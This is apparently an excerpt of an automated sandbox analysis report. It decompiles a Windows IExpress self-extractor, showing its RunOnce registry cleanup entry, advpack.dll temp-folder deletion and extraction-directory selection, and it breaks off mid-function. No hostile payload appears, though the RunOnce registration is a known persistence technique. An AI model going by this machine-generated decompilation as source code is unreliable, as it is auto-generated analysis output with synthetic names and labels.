                                                                                                                                                                                                        0x000c2c87
                                                                                                                                                                                                        0x000c2c7c
                                                                                                                                                                                                        0x000c2c74
                                                                                                                                                                                                        0x000c2c8e
                                                                                                                                                                                                        0x000c2c95
                                                                                                                                                                                                        0x000c2c98
                                                                                                                                                                                                        0x000c2c98
                                                                                                                                                                                                        0x000c2c9e
                                                                                                                                                                                                        0x000c2ca7

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersion.KERNEL32(?,00000002,00000000,?,000C6BB0,000C0000,00000000,00000002,0000000A), ref: 000C2C03
                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,?,000C6BB0,000C0000,00000000,00000002,0000000A), ref: 000C2C18
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 000C2C28
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,000C6BB0,000C0000,00000000,00000002,0000000A), ref: 000C2C98
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                        • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                        • API String ID: 62482547-3460614246
                                                                                                                                                                                                        • Opcode ID: 6fe65bfb5bde4ea31a203f59ecd1cd7788933d8e61ec52d7a595a2c6fb76c0f3
                                                                                                                                                                                                        • Instruction ID: b4e0b83eb89723717a3bc65aa6bb07d04adc5ae5bd4757ccf8fbcd5f448bb8d5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6fe65bfb5bde4ea31a203f59ecd1cd7788933d8e61ec52d7a595a2c6fb76c0f3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1411E571300709ABE7206BB5ACCDFAF3799AB85394B08002DF905D7692DE39EC418665
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C6F40() {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(E000C6EF0); // executed
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}



                                                                                                                                                                                                        0x000c6f45
                                                                                                                                                                                                        0x000c6f4d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 000C6F45
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                        • Opcode ID: e1167a52f338bbca0dea86b073e14fc502a9030ccb45c52b60a0f4a276ee586d
                                                                                                                                                                                                        • Instruction ID: 500c040d352c9a0020f382bb8d7691c657671b389a253cbcd30bc6026ff0477f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e1167a52f338bbca0dea86b073e14fc502a9030ccb45c52b60a0f4a276ee586d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F90027435110447A7201BB09D19D1975915B4E606B865465A511C8494DB6540405513
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E000C202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v528;
                                                                                                                                                                                                        				void* _v532;
                                                                                                                                                                                                        				int _v536;
                                                                                                                                                                                                        				int _v540;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        				long _t36;
                                                                                                                                                                                                        				long _t41;
                                                                                                                                                                                                        				struct HINSTANCE__* _t46;
                                                                                                                                                                                                        				intOrPtr _t49;
                                                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                                                        				CHAR* _t54;
                                                                                                                                                                                                        				void _t56;
                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                        				intOrPtr* _t72;
                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                        				intOrPtr* _t81;
                                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				void* _t90;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                        				signed int _t93;
                                                                                                                                                                                                        				void* _t94;
                                                                                                                                                                                                        				void* _t95;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t79 = __edx;
                                                                                                                                                                                                        				_t28 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                        				_t84 = 0x104;
                                                                                                                                                                                                        				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                        				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                        				_t95 = _t94 + 0x18;
                                                                                                                                                                                                        				_t66 = 0;
                                                                                                                                                                                                        				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                                        					L24:
                                                                                                                                                                                                        					return E000C6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(_t86);
                                                                                                                                                                                                        				_t87 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					E000C171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                        					_t95 = _t95 + 0x10;
                                                                                                                                                                                                        					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                        					if(_t41 != 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t87 = _t87 + 1;
                                                                                                                                                                                                        					if(_t87 < 0xc8) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					break;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t87 != 0xc8) {
                                                                                                                                                                                                        					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                        					_t79 = _t84;
                                                                                                                                                                                                        					E000C658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                        					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                        					_t84 = _t46;
                                                                                                                                                                                                        					if(_t84 == 0) {
                                                                                                                                                                                                        						L10:
                                                                                                                                                                                                        						if(GetModuleFileNameA( *0xc9a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        							L17:
                                                                                                                                                                                                        							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                        							L23:
                                                                                                                                                                                                        							_pop(_t86);
                                                                                                                                                                                                        							goto L24;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						_t72 =  &_v268;
                                                                                                                                                                                                        						_t80 = _t72 + 1;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t49 =  *_t72;
                                                                                                                                                                                                        							_t72 = _t72 + 1;
                                                                                                                                                                                                        						} while (_t49 != 0);
                                                                                                                                                                                                        						_t73 = _t72 - _t80;
                                                                                                                                                                                                        						_t81 = 0xc91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t50 =  *_t81;
                                                                                                                                                                                                        							_t81 = _t81 + 1;
                                                                                                                                                                                                        						} while (_t50 != 0);
                                                                                                                                                                                                        						_t84 = _t73 + 0x50 + _t81 - 0xc91e5;
                                                                                                                                                                                                        						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xc91e5);
                                                                                                                                                                                                        						if(_t90 != 0) {
                                                                                                                                                                                                        							 *0xc8580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                        							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                        							if(_t66 == 0) {
                                                                                                                                                                                                        								_t54 = "%s /D:%s";
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                        							E000C171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                        							_t75 = _t90;
                                                                                                                                                                                                        							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                        							_t79 = _t23;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t56 =  *_t75;
                                                                                                                                                                                                        								_t75 = _t75 + 1;
                                                                                                                                                                                                        							} while (_t56 != 0);
                                                                                                                                                                                                        							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                        							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                        							RegCloseKey(_v532); // executed
                                                                                                                                                                                                        							_t36 = LocalFree(_t90);
                                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t79 = 0x4b5;
                                                                                                                                                                                                        						E000C44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                        					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                        					FreeLibrary(_t84); // executed
                                                                                                                                                                                                        					if(_t91 == 0) {
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        						E000C658A( &_v268, 0x104, 0xc1140);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                        				 *0xc8530 = _t66;
                                                                                                                                                                                                        				goto L23;
                                                                                                                                                                                                        			}

































                                                                                                                                                                                                        0x000c202a
                                                                                                                                                                                                        0x000c2035
                                                                                                                                                                                                        0x000c203c
                                                                                                                                                                                                        0x000c2041
                                                                                                                                                                                                        0x000c2050
                                                                                                                                                                                                        0x000c205f
                                                                                                                                                                                                        0x000c2064
                                                                                                                                                                                                        0x000c206f
                                                                                                                                                                                                        0x000c208c
                                                                                                                                                                                                        0x000c2094
                                                                                                                                                                                                        0x000c2257
                                                                                                                                                                                                        0x000c2266
                                                                                                                                                                                                        0x000c2266
                                                                                                                                                                                                        0x000c209a
                                                                                                                                                                                                        0x000c209b
                                                                                                                                                                                                        0x000c209d
                                                                                                                                                                                                        0x000c20aa
                                                                                                                                                                                                        0x000c20af
                                                                                                                                                                                                        0x000c20c9
                                                                                                                                                                                                        0x000c20d1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c20d3
                                                                                                                                                                                                        0x000c20da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c20da
                                                                                                                                                                                                        0x000c20e2
                                                                                                                                                                                                        0x000c2103
                                                                                                                                                                                                        0x000c210e
                                                                                                                                                                                                        0x000c2116
                                                                                                                                                                                                        0x000c2122
                                                                                                                                                                                                        0x000c2128
                                                                                                                                                                                                        0x000c212c
                                                                                                                                                                                                        0x000c2179
                                                                                                                                                                                                        0x000c2194
                                                                                                                                                                                                        0x000c21de
                                                                                                                                                                                                        0x000c21e4
                                                                                                                                                                                                        0x000c2256
                                                                                                                                                                                                        0x000c2256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2256
                                                                                                                                                                                                        0x000c2196
                                                                                                                                                                                                        0x000c2196
                                                                                                                                                                                                        0x000c219c
                                                                                                                                                                                                        0x000c219f
                                                                                                                                                                                                        0x000c219f
                                                                                                                                                                                                        0x000c21a1
                                                                                                                                                                                                        0x000c21a2
                                                                                                                                                                                                        0x000c21a6
                                                                                                                                                                                                        0x000c21a8
                                                                                                                                                                                                        0x000c21b0
                                                                                                                                                                                                        0x000c21b0
                                                                                                                                                                                                        0x000c21b2
                                                                                                                                                                                                        0x000c21b3
                                                                                                                                                                                                        0x000c21bc
                                                                                                                                                                                                        0x000c21c7
                                                                                                                                                                                                        0x000c21cb
                                                                                                                                                                                                        0x000c21f1
                                                                                                                                                                                                        0x000c21f6
                                                                                                                                                                                                        0x000c21fd
                                                                                                                                                                                                        0x000c21ff
                                                                                                                                                                                                        0x000c21ff
                                                                                                                                                                                                        0x000c2204
                                                                                                                                                                                                        0x000c2213
                                                                                                                                                                                                        0x000c2218
                                                                                                                                                                                                        0x000c221d
                                                                                                                                                                                                        0x000c221d
                                                                                                                                                                                                        0x000c2220
                                                                                                                                                                                                        0x000c2220
                                                                                                                                                                                                        0x000c2222
                                                                                                                                                                                                        0x000c2223
                                                                                                                                                                                                        0x000c2229
                                                                                                                                                                                                        0x000c223d
                                                                                                                                                                                                        0x000c2249
                                                                                                                                                                                                        0x000c2250
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2250
                                                                                                                                                                                                        0x000c21d2
                                                                                                                                                                                                        0x000c21d9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c21d9
                                                                                                                                                                                                        0x000c213a
                                                                                                                                                                                                        0x000c2141
                                                                                                                                                                                                        0x000c2144
                                                                                                                                                                                                        0x000c214c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2163
                                                                                                                                                                                                        0x000c2172
                                                                                                                                                                                                        0x000c2172
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2163
                                                                                                                                                                                                        0x000c20ea
                                                                                                                                                                                                        0x000c20f0
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 000C2050
                                                                                                                                                                                                        • memset.MSVCRT ref: 000C205F
                                                                                                                                                                                                        • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 000C208C
                                                                                                                                                                                                          • Part of subcall function 000C171E: _vsnprintf.MSVCRT ref: 000C1750
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000C20C9
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000C20EA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 000C2103
                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000C2122
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 000C2134
                                                                                                                                                                                                        • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000C2144
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 000C215B
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000C218C
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000C21C1
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000C21E4
                                                                                                                                                                                                        • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 000C223D
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000C2249
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000C2250
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                        • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                                                                                                                                                                        • API String ID: 178549006-217856272
                                                                                                                                                                                                        • Opcode ID: 36cc67df7f1621da369932b0566b4099c36b9bd6ed15e3a45cf94e7d444ae28a
                                                                                                                                                                                                        • Instruction ID: 7d60d9713e6d677d633283fa5e3efa55d930817ce3e452e7a64df9f6d12fbc18
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 36cc67df7f1621da369932b0566b4099c36b9bd6ed15e3a45cf94e7d444ae28a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1512371A00218ABEB209B60DC4DFEF777CEB55740F1441ACFE09E7152DA759E898B60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 232 c55a0-c55d9 call c468f LocalAlloc 235 c55fd-c560c call c468f 232->235 236 c55db-c55f1 call c44b9 call c6285 232->236 242 c560e-c5630 call c44b9 LocalFree 235->242 243 c5632-c5643 lstrcmpA 235->243 250 c55f6-c55f8 236->250 242->250 244 c564b-c5659 LocalFree 243->244 245 c5645 243->245 248 c565b-c565d 244->248 249 c5696-c569c 244->249 245->244 252 c565f-c5667 248->252 253 c5669 248->253 255 c589f-c58b5 call c6517 249->255 256 c56a2-c56a8 249->256 254 c58b7-c58c7 call c6ce0 250->254 252->253 257 c566b-c567a call c5467 252->257 253->257 255->254 256->255 260 c56ae-c56c1 GetTempPathA 256->260 270 c589b-c589d 257->270 271 c5680-c5691 call c44b9 257->271 264 c56f3-c5711 call c1781 260->264 265 c56c3-c56c9 call c5467 260->265 275 c586c-c5890 GetWindowsDirectoryA call c597d 264->275 276 c5717-c5729 GetDriveTypeA 264->276 269 c56ce-c56d0 265->269 269->270 273 c56d6-c56df call c2630 269->273 270->254 271->250 273->264 286 c56e1-c56ed call c5467 273->286 275->264 287 c5896 275->287 280 c572b-c572e 276->280 281 c5730-c5740 GetFileAttributesA 276->281 280->281 284 c5742-c5745 280->284 281->284 285 c577e-c578f call c597d 281->285 289 c576b 284->289 290 c5747-c574f 284->290 298 c5791-c579e call c2630 285->298 299 c57b2-c57bf call c2630 285->299 286->264 286->270 287->270 292 c5771-c5779 289->292 290->292 294 c5751-c5753 290->294 297 c5864-c5866 292->297 294->292 295 c5755-c5762 call c6952 294->295 295->289 308 c5764-c5769 295->308 297->275 297->276 298->289 309 c57a0-c57b0 call c597d 298->309 306 c57c1-c57cd GetWindowsDirectoryA 299->306 307 c57d3-c57f8 call c658a GetFileAttributesA 299->307 306->307 314 c580a 307->314 315 c57fa-c5808 CreateDirectoryA 307->315 308->285 308->289 309->289 309->299 316 c580d-c580f 314->316 315->316 317 c5827-c585c SetFileAttributesA call c1781 call c5467 316->317 318 c5811-c5825 316->318 317->270 323 c585e 317->323 318->297 323->297
                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E000C55A0(void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v265;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        				int _t32;
                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                        				int _t35;
                                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                        				int _t40;
                                                                                                                                                                                                        				int _t44;
                                                                                                                                                                                                        				long _t48;
                                                                                                                                                                                                        				int _t49;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				int _t54;
                                                                                                                                                                                                        				int _t59;
                                                                                                                                                                                                        				char _t60;
                                                                                                                                                                                                        				int _t65;
                                                                                                                                                                                                        				char _t66;
                                                                                                                                                                                                        				int _t67;
                                                                                                                                                                                                        				int _t68;
                                                                                                                                                                                                        				int _t69;
                                                                                                                                                                                                        				int _t70;
                                                                                                                                                                                                        				int _t71;
                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                        				int _t73;
                                                                                                                                                                                                        				CHAR* _t82;
                                                                                                                                                                                                        				CHAR* _t88;
                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t28 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                        				_t2 = E000C468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                        				if(_t109 != 0) {
                                                                                                                                                                                                        					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                        					_t32 = E000C468F(_t82, _t109, 1);
                                                                                                                                                                                                        					__eflags = _t32;
                                                                                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                                                                                        						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                        						__eflags = _t33;
                                                                                                                                                                                                        						if(_t33 == 0) {
                                                                                                                                                                                                        							 *0xc9a30 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						LocalFree(_t109);
                                                                                                                                                                                                        						_t35 =  *0xc8b3e; // 0x0
                                                                                                                                                                                                        						__eflags = _t35;
                                                                                                                                                                                                        						if(_t35 == 0) {
                                                                                                                                                                                                        							__eflags =  *0xc8a24; // 0x0
                                                                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                                                                        								L46:
                                                                                                                                                                                                        								_t101 = 0x7d2;
                                                                                                                                                                                                        								_t36 = E000C6517(_t82, 0x7d2, 0, E000C3210, 0, 0);
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								_t38 =  ~( ~_t36);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								__eflags =  *0xc9a30; // 0x0
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									goto L46;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t109 = 0xc91e4;
                                                                                                                                                                                                        									_t40 = GetTempPathA(0x104, 0xc91e4);
                                                                                                                                                                                                        									__eflags = _t40;
                                                                                                                                                                                                        									if(_t40 == 0) {
                                                                                                                                                                                                        										L19:
                                                                                                                                                                                                        										_push(_t82);
                                                                                                                                                                                                        										E000C1781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                        										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                        										if(_v268 <= 0x5a) {
                                                                                                                                                                                                        											do {
                                                                                                                                                                                                        												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                        												__eflags = _t109 - 6;
                                                                                                                                                                                                        												if(_t109 == 6) {
                                                                                                                                                                                                        													L22:
                                                                                                                                                                                                        													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                        													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L23;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													__eflags = _t109 - 3;
                                                                                                                                                                                                        													if(_t109 != 3) {
                                                                                                                                                                                                        														L23:
                                                                                                                                                                                                        														__eflags = _t109 - 2;
                                                                                                                                                                                                        														if(_t109 != 2) {
                                                                                                                                                                                                        															L28:
                                                                                                                                                                                                        															_t66 = _v268;
                                                                                                                                                                                                        															goto L29;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t66 = _v268;
                                                                                                                                                                                                        															__eflags = _t66 - 0x41;
                                                                                                                                                                                                        															if(_t66 == 0x41) {
                                                                                                                                                                                                        																L29:
                                                                                                                                                                                                        																_t60 = _t66 + 1;
                                                                                                                                                                                                        																_v268 = _t60;
                                                                                                                                                                                                        																goto L42;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																__eflags = _t66 - 0x42;
                                                                                                                                                                                                        																if(_t66 == 0x42) {
                                                                                                                                                                                                        																	goto L29;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t68 = E000C6952( &_v268);
                                                                                                                                                                                                        																	__eflags = _t68;
                                                                                                                                                                                                        																	if(_t68 == 0) {
                                                                                                                                                                                                        																		goto L28;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                        																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                        																			L30:
                                                                                                                                                                                                        																			_push(0);
                                                                                                                                                                                                        																			_t103 = 3;
                                                                                                                                                                                                        																			_t49 = E000C597D( &_v268, _t103, 1);
                                                                                                                                                                                                        																			__eflags = _t49;
                                                                                                                                                                                                        																			if(_t49 != 0) {
                                                                                                                                                                                                        																				L33:
                                                                                                                                                                                                        																				_t50 = E000C2630(0,  &_v268, 1);
                                                                                                                                                                                                        																				__eflags = _t50;
                                                                                                                                                                                                        																				if(_t50 != 0) {
                                                                                                                                                                                                        																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				_t88 =  &_v268;
                                                                                                                                                                                                        																				E000C658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                        																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                        																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                        																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                        																					__eflags = _t54;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				__eflags = _t54;
                                                                                                                                                                                                        																				if(_t54 != 0) {
                                                                                                                                                                                                        																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                        																					_push(_t88);
